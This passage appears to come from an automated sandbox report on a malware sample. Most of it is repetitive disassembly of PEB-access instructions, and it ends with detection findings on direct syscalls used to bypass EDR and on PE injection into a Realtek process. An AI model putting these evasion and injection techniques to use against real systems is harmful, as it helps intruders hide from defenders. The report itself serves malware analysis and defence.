                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B252B mov eax, dword ptr fs:[00000030h]2_2_014B252B
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B252B mov eax, dword ptr fs:[00000030h]2_2_014B252B
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B252B mov eax, dword ptr fs:[00000030h]2_2_014B252B
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B252B mov eax, dword ptr fs:[00000030h]2_2_014B252B
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B252B mov eax, dword ptr fs:[00000030h]2_2_014B252B
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014D1527 mov eax, dword ptr fs:[00000030h]2_2_014D1527
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014DF523 mov eax, dword ptr fs:[00000030h]2_2_014DF523
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149753F mov eax, dword ptr fs:[00000030h]2_2_0149753F
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149753F mov eax, dword ptr fs:[00000030h]2_2_0149753F
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149753F mov eax, dword ptr fs:[00000030h]2_2_0149753F
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2539 mov eax, dword ptr fs:[00000030h]2_2_014E2539
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014A3536 mov eax, dword ptr fs:[00000030h]2_2_014A3536
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014A3536 mov eax, dword ptr fs:[00000030h]2_2_014A3536
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0152B5D3 mov eax, dword ptr fs:[00000030h]2_2_0152B5D3
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014DC5C6 mov eax, dword ptr fs:[00000030h]2_2_014DC5C6
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149F5C7 mov eax, dword ptr fs:[00000030h]2_2_0149F5C7
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149F5C7 mov eax, dword ptr fs:[00000030h]2_2_0149F5C7
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149F5C7 mov eax, dword ptr fs:[00000030h]2_2_0149F5C7
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149F5C7 mov eax, dword ptr fs:[00000030h]2_2_0149F5C7
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149F5C7 mov eax, dword ptr fs:[00000030h]2_2_0149F5C7
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149F5C7 mov eax, dword ptr fs:[00000030h]2_2_0149F5C7
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149F5C7 mov eax, dword ptr fs:[00000030h]2_2_0149F5C7
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149F5C7 mov eax, dword ptr fs:[00000030h]2_2_0149F5C7
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149F5C7 mov eax, dword ptr fs:[00000030h]2_2_0149F5C7
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_015205C6 mov eax, dword ptr fs:[00000030h]2_2_015205C6
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014D65D0 mov eax, dword ptr fs:[00000030h]2_2_014D65D0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014D15EF mov eax, dword ptr fs:[00000030h]2_2_014D15EF
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014AB5E0 mov eax, dword ptr fs:[00000030h]2_2_014AB5E0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014AB5E0 mov eax, dword ptr fs:[00000030h]2_2_014AB5E0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014AB5E0 mov eax, dword ptr fs:[00000030h]2_2_014AB5E0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014AB5E0 mov eax, dword ptr fs:[00000030h]2_2_014AB5E0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014AB5E0 mov eax, dword ptr fs:[00000030h]2_2_014AB5E0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014AB5E0 mov eax, dword ptr fs:[00000030h]2_2_014AB5E0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014DA5E7 mov ebx, dword ptr fs:[00000030h]2_2_014DA5E7
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014DA5E7 mov eax, dword ptr fs:[00000030h]2_2_014DA5E7
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0152C5FC mov eax, dword ptr fs:[00000030h]2_2_0152C5FC
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_015255E0 mov eax, dword ptr fs:[00000030h]2_2_015255E0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0152C592 mov eax, dword ptr fs:[00000030h]2_2_0152C592
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_01547591 mov edi, dword ptr fs:[00000030h]2_2_01547591
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014DA580 mov eax, dword ptr fs:[00000030h]2_2_014DA580
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014DA580 mov eax, dword ptr fs:[00000030h]2_2_014DA580
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014D9580 mov eax, dword ptr fs:[00000030h]2_2_014D9580
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014D9580 mov eax, dword ptr fs:[00000030h]2_2_014D9580
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0155F582 mov eax, dword ptr fs:[00000030h]2_2_0155F582
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0151E588 mov eax, dword ptr fs:[00000030h]2_2_0151E588
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0151E588 mov eax, dword ptr fs:[00000030h]2_2_0151E588
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014D2594 mov eax, dword ptr fs:[00000030h]2_2_014D2594
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_015285AA mov eax, dword ptr fs:[00000030h]2_2_015285AA
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014A45B0 mov eax, dword ptr fs:[00000030h]2_2_014A45B0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014A45B0 mov eax, dword ptr fs:[00000030h]2_2_014A45B0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B0445 mov eax, dword ptr fs:[00000030h]2_2_014B0445
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B0445 mov eax, dword ptr fs:[00000030h]2_2_014B0445
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B0445 mov eax, dword ptr fs:[00000030h]2_2_014B0445
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B0445 mov eax, dword ptr fs:[00000030h]2_2_014B0445
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B0445 mov eax, dword ptr fs:[00000030h]2_2_014B0445
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B0445 mov eax, dword ptr fs:[00000030h]2_2_014B0445
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_01520443 mov eax, dword ptr fs:[00000030h]2_2_01520443
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014CE45E mov eax, dword ptr fs:[00000030h]2_2_014CE45E
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014CE45E mov eax, dword ptr fs:[00000030h]2_2_014CE45E
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014CE45E mov eax, dword ptr fs:[00000030h]2_2_014CE45E
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014CE45E mov eax, dword ptr fs:[00000030h]2_2_014CE45E
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014CE45E mov eax, dword ptr fs:[00000030h]2_2_014CE45E
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014DD450 mov eax, dword ptr fs:[00000030h]2_2_014DD450
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014DD450 mov eax, dword ptr fs:[00000030h]2_2_014DD450
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014AD454 mov eax, dword ptr fs:[00000030h]2_2_014AD454
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014AD454 mov eax, dword ptr fs:[00000030h]2_2_014AD454
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014AD454 mov eax, dword ptr fs:[00000030h]2_2_014AD454
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014AD454 mov eax, dword ptr fs:[00000030h]2_2_014AD454
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014AD454 mov eax, dword ptr fs:[00000030h]2_2_014AD454
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014AD454 mov eax, dword ptr fs:[00000030h]2_2_014AD454
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0155F478 mov eax, dword ptr fs:[00000030h]2_2_0155F478
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0156A464 mov eax, dword ptr fs:[00000030h]2_2_0156A464
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0152E461 mov eax, dword ptr fs:[00000030h]2_2_0152E461
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014A8470 mov eax, dword ptr fs:[00000030h]2_2_014A8470
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014A8470 mov eax, dword ptr fs:[00000030h]2_2_014A8470
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149640D mov eax, dword ptr fs:[00000030h]2_2_0149640D
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_01536400 mov eax, dword ptr fs:[00000030h]2_2_01536400
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_01536400 mov eax, dword ptr fs:[00000030h]2_2_01536400
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0155F409 mov eax, dword ptr fs:[00000030h]2_2_0155F409
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0155D430 mov eax, dword ptr fs:[00000030h]2_2_0155D430
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0155D430 mov eax, dword ptr fs:[00000030h]2_2_0155D430
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014D7425 mov eax, dword ptr fs:[00000030h]2_2_014D7425
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014D7425 mov ecx, dword ptr fs:[00000030h]2_2_014D7425
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149B420 mov eax, dword ptr fs:[00000030h]2_2_0149B420
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_01529429 mov eax, dword ptr fs:[00000030h]2_2_01529429
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0152F42F mov eax, dword ptr fs:[00000030h]2_2_0152F42F
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0152F42F mov eax, dword ptr fs:[00000030h]2_2_0152F42F
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0152F42F mov eax, dword ptr fs:[00000030h]2_2_0152F42F
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0152F42F mov eax, dword ptr fs:[00000030h]2_2_0152F42F
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0152F42F mov eax, dword ptr fs:[00000030h]2_2_0152F42F
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014C14C9 mov eax, dword ptr fs:[00000030h]2_2_014C14C9
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014C14C9 mov eax, dword ptr fs:[00000030h]2_2_014C14C9
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014C14C9 mov eax, dword ptr fs:[00000030h]2_2_014C14C9
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014C14C9 mov eax, dword ptr fs:[00000030h]2_2_014C14C9
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014C14C9 mov eax, dword ptr fs:[00000030h]2_2_014C14C9
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014CF4D0 mov eax, dword ptr fs:[00000030h]2_2_014CF4D0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014CF4D0 mov eax, dword ptr fs:[00000030h]2_2_014CF4D0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014CF4D0 mov eax, dword ptr fs:[00000030h]2_2_014CF4D0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014CF4D0 mov eax, dword ptr fs:[00000030h]2_2_014CF4D0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014CF4D0 mov eax, dword ptr fs:[00000030h]2_2_014CF4D0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014CF4D0 mov eax, dword ptr fs:[00000030h]2_2_014CF4D0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014CF4D0 mov eax, dword ptr fs:[00000030h]2_2_014CF4D0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014CF4D0 mov eax, dword ptr fs:[00000030h]2_2_014CF4D0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014CF4D0 mov eax, dword ptr fs:[00000030h]2_2_014CF4D0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014C44D1 mov eax, dword ptr fs:[00000030h]2_2_014C44D1
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014C44D1 mov eax, dword ptr fs:[00000030h]2_2_014C44D1
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0152E4F2 mov eax, dword ptr fs:[00000030h]2_2_0152E4F2
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0152E4F2 mov eax, dword ptr fs:[00000030h]2_2_0152E4F2
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014DE4EF mov eax, dword ptr fs:[00000030h]2_2_014DE4EF
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014DE4EF mov eax, dword ptr fs:[00000030h]2_2_014DE4EF
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0155F4FD mov eax, dword ptr fs:[00000030h]2_2_0155F4FD
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014D54E0 mov eax, dword ptr fs:[00000030h]2_2_014D54E0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014C94FA mov eax, dword ptr fs:[00000030h]2_2_014C94FA
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014A64F0 mov eax, dword ptr fs:[00000030h]2_2_014A64F0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014DA4F0 mov eax, dword ptr fs:[00000030h]2_2_014DA4F0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014DA4F0 mov eax, dword ptr fs:[00000030h]2_2_014DA4F0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0152C490 mov eax, dword ptr fs:[00000030h]2_2_0152C490
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014D648A mov eax, dword ptr fs:[00000030h]2_2_014D648A
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014D648A mov eax, dword ptr fs:[00000030h]2_2_014D648A
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014D648A mov eax, dword ptr fs:[00000030h]2_2_014D648A
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014A0485 mov ecx, dword ptr fs:[00000030h]2_2_014A0485
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014DB490 mov eax, dword ptr fs:[00000030h]2_2_014DB490
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014DB490 mov eax, dword ptr fs:[00000030h]2_2_014DB490
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014D44A8 mov eax, dword ptr fs:[00000030h]2_2_014D44A8
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014A24A2 mov eax, dword ptr fs:[00000030h]2_2_014A24A2
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014A24A2 mov ecx, dword ptr fs:[00000030h]2_2_014A24A2
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_015384BB mov eax, dword ptr fs:[00000030h]2_2_015384BB
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014DE4BC mov eax, dword ptr fs:[00000030h]2_2_014DE4BC
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0152D4A0 mov ecx, dword ptr fs:[00000030h]2_2_0152D4A0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0152D4A0 mov eax, dword ptr fs:[00000030h]2_2_0152D4A0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0152D4A0 mov eax, dword ptr fs:[00000030h]2_2_0152D4A0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0154E750 mov eax, dword ptr fs:[00000030h]2_2_0154E750
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014D174A mov eax, dword ptr fs:[00000030h]2_2_014D174A
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014D3740 mov eax, dword ptr fs:[00000030h]2_2_014D3740
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149F75B mov eax, dword ptr fs:[00000030h]2_2_0149F75B
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149F75B mov eax, dword ptr fs:[00000030h]2_2_0149F75B
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149F75B mov eax, dword ptr fs:[00000030h]2_2_0149F75B
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149F75B mov eax, dword ptr fs:[00000030h]2_2_0149F75B
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149F75B mov eax, dword ptr fs:[00000030h]2_2_0149F75B
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149F75B mov eax, dword ptr fs:[00000030h]2_2_0149F75B
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149F75B mov eax, dword ptr fs:[00000030h]2_2_0149F75B
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149F75B mov eax, dword ptr fs:[00000030h]2_2_0149F75B
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149F75B mov eax, dword ptr fs:[00000030h]2_2_0149F75B
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014C2755 mov eax, dword ptr fs:[00000030h]2_2_014C2755
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014C2755 mov eax, dword ptr fs:[00000030h]2_2_014C2755
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014C2755 mov eax, dword ptr fs:[00000030h]2_2_014C2755
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014C2755 mov ecx, dword ptr fs:[00000030h]2_2_014C2755
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014C2755 mov eax, dword ptr fs:[00000030h]2_2_014C2755
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014C2755 mov eax, dword ptr fs:[00000030h]2_2_014C2755
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0152174B mov eax, dword ptr fs:[00000030h]2_2_0152174B
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0152174B mov ecx, dword ptr fs:[00000030h]2_2_0152174B
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014DA750 mov eax, dword ptr fs:[00000030h]2_2_014DA750
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B2760 mov ecx, dword ptr fs:[00000030h]2_2_014B2760
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E1763 mov eax, dword ptr fs:[00000030h]2_2_014E1763
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E1763 mov eax, dword ptr fs:[00000030h]2_2_014E1763
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E1763 mov eax, dword ptr fs:[00000030h]2_2_014E1763
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E1763 mov eax, dword ptr fs:[00000030h]2_2_014E1763
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E1763 mov eax, dword ptr fs:[00000030h]2_2_014E1763
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E1763 mov eax, dword ptr fs:[00000030h]2_2_014E1763
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014A4779 mov eax, dword ptr fs:[00000030h]2_2_014A4779
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014A4779 mov eax, dword ptr fs:[00000030h]2_2_014A4779
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014D0774 mov eax, dword ptr fs:[00000030h]2_2_014D0774
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014C270D mov eax, dword ptr fs:[00000030h]2_2_014C270D
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtQuerySystemInformation: Direct from: 0x351436DJump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x3515954Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x3DBC775Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtQueryInformationToken: Direct from: 0x350CC5FJump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x350B105Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtResumeThread: Direct from: 0x3DBC9B7Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtClose: Direct from: 0x7FFAAECE9E7F
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtClose: Direct from: 0x3514562
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x351441CJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeNtResumeThread: Indirect: 0x1383B10Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x3DBC946Jump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeNtQueueApcThread: Indirect: 0x137F334Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x35142D1Jump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeNtSetContextThread: Indirect: 0x13834F0Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtCreateThreadEx: Direct from: 0x350B95FJump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x7FFAE1422651Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x350D322Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x350D366Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x350C552Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x350D237Jump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeNtClose: Indirect: 0x137F3B9
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x35144C4Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x350D2F3Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x3DC44CDJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeNtSuspendThread: Indirect: 0x1383800Jump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeMemory written: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
